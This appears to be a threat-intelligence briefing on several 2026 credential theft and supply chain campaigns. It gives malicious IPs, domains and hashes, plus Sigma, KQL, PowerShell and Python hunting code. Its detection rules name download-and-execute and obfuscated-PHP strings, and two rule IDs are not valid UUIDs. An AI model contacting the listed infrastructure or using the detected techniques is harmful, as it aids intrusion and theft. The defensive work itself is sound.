Recent OTX pulses reveal a convergence of sophisticated credential theft operations and supply chain compromises targeting high-value sectors including cryptocurrency, software development, and major event hospitality (FIFA World Cup 2026).
The threat landscape is dominated by the DataBreachPlus group deploying the TwizAdmin suite—a multi-stage operation combining crypto-clipping, BIP-39 seed phrase theft, and ransomware. Simultaneously, JINX-0164 is actively targeting software developers via LinkedIn phishing to deliver Python-based macOS malware (AUDIOFIX, MINIRAT). Parallel to these targeted attacks, mass-scale phishing operations by GHOST STADIUM are leveraging Vidar and Lumma stealers to harvest credentials, while a critical supply chain attack on the Laravel Lang packages has introduced RCE backdoors into development environments. Notably, threat actors are also leveraging blockchain infrastructure (BSC Testnet) for C2 communications, utilizing the "EtherHiding" technique to ensure resilience against takedowns.
Threat Actor / Malware Profile
DataBreachPlus (TwizAdmin)
- Malware Families: TwizAdmin, crpx0 (Ransomware)
- Distribution: Malicious FedEx-themed lures targeting Windows and macOS.
- Capabilities: Clipboard hijacking for 8 cryptocurrency chains, theft of BIP-39 seed phrases, browser credential exfiltration, and ransomware deployment.
- Infrastructure: FastAPI-based C2 panel located at 103.241.66[.]238:1337, featuring a license key system.
JINX-0164
- Malware Families: AUDIOFIX (Python Infostealer/RAT), MINIRAT (Go Backdoor)
- Distribution: LinkedIn social engineering posing as recruiters; NPM trojan supply chain attacks.
- Capabilities: Steals system information, maintains persistence on macOS, facilitates lateral movement via lightweight Go backdoor.
GHOST STADIUM
- Malware Families: Vidar, Lumma
- Distribution: Facebook ads and over 4,300 fraudulent domains impersonating FIFA 2026 World Cup services.
- Capabilities: Pixel-perfect credential harvesting, phishing-as-a-service (PaaS) ecosystem.
ClearFake / EtherHiding Actors
- Malware Families: SectopRAT, ACRStealer
- Technique: "ClickFix" fake browser updates injecting JS into compromised sites. Uses BNB Smart Chain (BSC) testnet smart contracts to store C2 URLs, making the infrastructure immutable.
Laravel Lang Compromise
- Vector: Compromised community-maintained packages (laravel-lang/lang, etc.) via credential theft.
- Payload: helpers.php containing obfuscated PHP code facilitating RCE and data exfiltration to flipboxstudio.info.
IOC Analysis
The provided indicators span multiple infrastructure types:
- Domains/Hostnames: Mostly typosquatting (e.g., fifa.gold, login.teamicrosoft.com) or dedicated delivery networks (fanonlyatn.xyz).
- File Hashes (SHA256): Prevalence of executables likely representing droppers or payloads for TwizAdmin, AUDIOFIX, and Vidar.
- IPv4: Specific C2 IPs such as 103.241.66[.]238 and 148.178.22.16.
- Operationalization: SOC teams should immediately block listed domains and IPs at the perimeter. File hashes should be uploaded to EDR solutions for alerting on execution. The Laravel compromise requires a review of composer.lock files against the malicious package versions.
Detection Engineering
```yaml
---
title: Potential TwizAdmin Crypto Clipper Activity
id: 0d7f8b1a-5e3c-4f8a-9b2c-1d3e4f5a6b7c
description: Detects potential execution of TwizAdmin clipper behavior via monitoring for suspicious clipboard access patterns or known malicious process arguments often associated with Java-based RAT builders.
status: experimental
date: 2026/05/29
author: Security Arsenal Research
references:
  - https://otx.alienvault.com/pulse/64271f3210715648666b4566
tags:
  - attack.credential_access
  - attack.execution
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    CommandLine|contains:
      - 'BIP39'
      - 'seed phrase'
      - 'mnemonic'
      - 'clipper'
  condition: selection
falsepositives:
  - Legitimate cryptocurrency wallet management software
level: high
---
title: Suspicious PHP Backdoor Execution (Laravel Lang Compromise)
id: 1e8g9h2i-6j4k-5l9m-0n3o-4p5q6r7s8t9u
description: Detects the execution of PHP scripts with base64 encoded arguments or common webshell patterns associated with the Laravel Lang helpers.php backdoor.
status: experimental
date: 2026/05/29
author: Security Arsenal Research
references:
  - https://otx.alienvault.com/pulse/64271f3210715648666b4570
tags:
  - attack.persistence
  - attack.web_shell
logsource:
  category: process_creation
  product: windows
detection:
  selection_img:
    Image|endswith:
      - '\php.exe'
      - '\php-cgi.exe'
  selection_cli:
    CommandLine|contains:
      - 'base64_decode'
      - 'eval(base64'
      - 'helpers.php'
  condition: all of selection_*
falsepositives:
  - Legitimate developer debugging activity
level: critical
---
title: Infostealer PowerShell Payload (Vidar/Lumma/Generic)
id: 2f9g0h3j-7k5l-6m0n-1o4p-5q6r7s8t9u0v
description: Detects PowerShell commands often used by stealers like Vidar and Lumma to download payloads or exfiltrate browser data.
status: experimental
date: 2026/05/29
author: Security Arsenal Research
references:
  - https://otx.alienvault.com/pulse/64271f3210715648666b4568
tags:
  - attack.execution
  - attack.command_and_control
logsource:
  category: process_creation
  product: windows
detection:
  selection_pwsh:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
  selection_suspicious:
    CommandLine|contains:
      - 'Invoke-WebRequest'
      - 'IEX'
      - 'DownloadString'
      - 'http://89.36.224.5' # Specific IOCs from JINX-0164
      - 'fanonlyatn.xyz'
  condition: all of selection_*
falsepositives:
  - System administration scripts
level: medium
```
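The selection logic of the three rules above, as an added example that is not part of the report: a small Python evaluator covering only the modifiers (contains, endswith) and condition forms those rules use, run over constructed process_creation events to show which rule fires on which event.

```python
# Selections copied from the three rules above. Sigma string matching is
# case-insensitive by default, so both sides are lower-cased before comparing.
RULES = {
    "twizadmin_clipper": {
        "selection": {"CommandLine|contains": ["BIP39", "seed phrase", "mnemonic", "clipper"]},
        "condition": "selection"},
    "laravel_php_backdoor": {
        "selection_img": {"Image|endswith": ["\\php.exe", "\\php-cgi.exe"]},
        "selection_cli": {"CommandLine|contains": ["base64_decode", "eval(base64", "helpers.php"]},
        "condition": "all of selection_*"},
    "stealer_powershell": {
        "selection_pwsh": {"Image|endswith": ["\\powershell.exe", "\\pwsh.exe"]},
        "selection_suspicious": {"CommandLine|contains": [
            "Invoke-WebRequest", "IEX", "DownloadString", "http://89.36.224.5", "fanonlyatn.xyz"]},
        "condition": "all of selection_*"},
}

def field_matches(event, key, values):
    """One 'Field|modifier' entry holds if ANY listed value matches (Sigma OR)."""
    field, _, modifier = key.partition("|")
    actual = str(event.get(field, "")).lower()
    if modifier == "contains":
        return any(v.lower() in actual for v in values)
    if modifier == "endswith":
        return any(actual.endswith(v.lower()) for v in values)
    raise ValueError(f"modifier not supported by this evaluator: {modifier!r}")

def rule_matches(rule, event):
    """Handles the two condition forms used above: a bare selection name or
    'all of prefix*'. Entries inside one selection are ANDed, as in Sigma."""
    condition = rule["condition"]
    selections = {k: v for k, v in rule.items() if k != "condition"}
    if condition.startswith("all of ") and condition.endswith("*"):
        prefix = condition[len("all of "):-1]
        names = [n for n in selections if n.startswith(prefix)]
    else:
        names = [condition]
    return bool(names) and all(field_matches(event, k, v)
                               for n in names for k, v in selections[n].items())

def evaluate(event):
    """Names of the rules that fire on a single process_creation event."""
    return [name for name, rule in RULES.items() if rule_matches(rule, event)]

# Constructed sample events (not real telemetry): a PHP backdoor-style invocation,
# a PowerShell fetch from a listed domain, and a benign wallet restore that trips
# the clipper rule's documented false positive.
SAMPLE_EVENTS = [
    {"Image": r"C:\php\php.exe", "CommandLine": "php.exe -r \"eval(base64_decode('aGk='));\""},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c \"Invoke-WebRequest http://fanonlyatn.xyz/update\""},
    {"Image": r"C:\Program Files\Wallet\wallet.exe", "CommandLine": "wallet.exe --restore-mnemonic"},
]
```

The third sample illustrates why the clipper rule is best treated as a hunting lead rather than an auto-block signal.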
```kql
// Hunt for network connections to known malicious infrastructure from pulses
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl in~ (
    "fanonlyatn.xyz",
    "fifa.gold", "fifa.black", "fifa.tax", "fifaweb.com", "fifa.red", "fifa.fund", "fifa-com.shop",
    "driver-updater.net",
    "live.ong",
    "flipboxstudio.info",
    "afraid.veloitall.cfd"
  )
  or RemoteIP in ("103.241.66.238", "148.178.22.16", "89.36.224.5")
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemoteIP, RemotePort
| summarize count() by RemoteUrl, RemoteIP, DeviceName
| order by count_ desc
```
```powershell
# IOC Hunt Script for TwizAdmin and Laravel Backdoors
$MaliciousHashes = @(
    "06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092",
    "3fcd267e811d9b83cafa3d8d6932fa1c56f4fd8dcf46f9ec346e0689439532d4",
    "584796212f99efc7ac765d6048913fe34e46a64b13a8a78fb3a465b8c61f3527",
    "74ab520e94b2f3b8915ec7b47abab7a2d7e9759add5aa195af7edf0ffa5b4150",
    "9d9783f57fd543043e0792d125831883259c823a5eaa69211e5254db4db4eaec",
    "b6cab0b3aa8e56e2427f486c74588d598ae58bb0cbc0eda6939fe171cb0aed17"
)
$SuspiciousPaths = @(
    "C:\Users\*\AppData\Roaming\Microsoft\Crypto",
    "C:\xampp\htdocs\laravel-lang\lang\helpers.php"
)

# Case-insensitive set (Get-FileHash returns upper-case hex) so the drive is
# walked and each file hashed once, then looked up against every IOC at once.
$HashSet = [System.Collections.Generic.HashSet[string]]::new([System.StringComparer]::OrdinalIgnoreCase)
foreach ($h in $MaliciousHashes) { [void]$HashSet.Add($h) }

Write-Host "Checking for known malicious file hashes..."
Get-ChildItem -Path C:\ -File -Recurse -ErrorAction SilentlyContinue |
    Where-Object { $_.Length -gt 0 } |
    ForEach-Object {
        $fileHash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
        if ($fileHash -and $HashSet.Contains($fileHash)) {
            Write-Host "[ALERT] Malicious file found: $($_.FullName) ($fileHash)" -ForegroundColor Red
        }
    }

Write-Host "Checking for suspicious file paths related to Laravel/TwizAdmin..."
foreach ($pathPattern in $SuspiciousPaths) {
    # Resolve-Path expands the wildcard in the AppData pattern to every user profile
    $resolvedPaths = Resolve-Path $pathPattern -ErrorAction SilentlyContinue
    if ($resolvedPaths) {
        Write-Host "[WARN] Suspicious path detected: $resolvedPaths" -ForegroundColor Yellow
    }
}
```
Response Priorities
Immediate (0-24h):
- Block all domains and IPs listed in the IOC Analysis section at the firewall and proxy level.
- Scan all endpoints for the specific SHA256 hashes provided in the TwizAdmin and JINX-0164 pulses.
- Audit web servers for the presence of helpers.php in laravel-lang directories and remove any instances immediately.
24-48h:
- Initiate credential resets for developers who may have interacted with the compromised Laravel packages or clicked on LinkedIn recruitment lures.
- Review browser history and DNS logs for connections to fifa.* domains or flipboxstudio.info to identify potential phishing victims.
1 Week:
- Implement strict allow-listing for PHP execution and Composer package updates.
- Enforce MFA verification for all developer accounts and cryptocurrency wallets.
- Conduct a supply chain audit of all third-party libraries currently in use.
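One way to carry out the composer.lock review from the IOC Analysis section and the helpers.php audit from the Immediate priorities together, as an added example that is not code from the report or from the Laravel Lang project: list every pinned laravel-lang/* package and scan its installed directory for the obfuscation and exfiltration markers the report describes. It assumes the standard Composer layout vendor/<vendor>/<package>/; the lock file, versions and helpers.php stub below are constructed fixtures.

```python
import json
import os
import re
import tempfile

# Markers taken from the report's description of the helpers.php backdoor:
# obfuscated PHP (base64/eval) and the exfiltration host.
SUSPICIOUS_PATTERNS = [
    re.compile(r"eval\s*\(\s*base64_decode", re.I),
    re.compile(r"base64_decode\s*\(", re.I),
    re.compile(r"flipboxstudio\.info", re.I),
]

def laravel_lang_packages(lock_text):
    """Return {name: version} for every laravel-lang/* entry in a composer.lock."""
    lock = json.loads(lock_text)
    found = {}
    for section in ("packages", "packages-dev"):
        for pkg in lock.get(section, []):
            if pkg.get("name", "").startswith("laravel-lang/"):
                found[pkg["name"]] = pkg.get("version", "?")
    return found

def scan_helpers(vendor_dir, packages):
    """Check vendor/<vendor>/<package>/helpers.php for the markers (layout assumed).
    Returns {name: [matched patterns]}; packages without helpers.php are skipped."""
    findings = {}
    for name in packages:
        path = os.path.join(vendor_dir, *name.split("/"), "helpers.php")
        if not os.path.isfile(path):
            continue
        with open(path, encoding="utf-8", errors="replace") as fh:
            body = fh.read()
        hits = [p.pattern for p in SUSPICIOUS_PATTERNS if p.search(body)]
        if hits:
            findings[name] = hits
    return findings

# Constructed lock file (versions invented): two laravel-lang packages, one other.
LOCK = json.dumps({"packages": [
    {"name": "laravel-lang/lang", "version": "0.0.0-constructed"},
    {"name": "laravel-lang/attributes", "version": "0.0.0-constructed"},
    {"name": "laravel/framework", "version": "0.0.0-constructed"}]})

def demo():
    """Build a throwaway vendor tree with one backdoor-like helpers.php and scan it."""
    with tempfile.TemporaryDirectory() as vendor:
        bad = os.path.join(vendor, "laravel-lang", "lang")
        os.makedirs(bad)
        with open(os.path.join(bad, "helpers.php"), "w", encoding="utf-8") as fh:
            fh.write("<?php eval(base64_decode('Li4u')); // constructed stub, not the real payload\n")
        pkgs = laravel_lang_packages(LOCK)
        return pkgs, scan_helpers(vendor, pkgs)
```

On a real host, pass the project's composer.lock contents and its vendor directory instead of the fixture; a package that is pinned but has no hit still needs its version compared against the advisory once those are published.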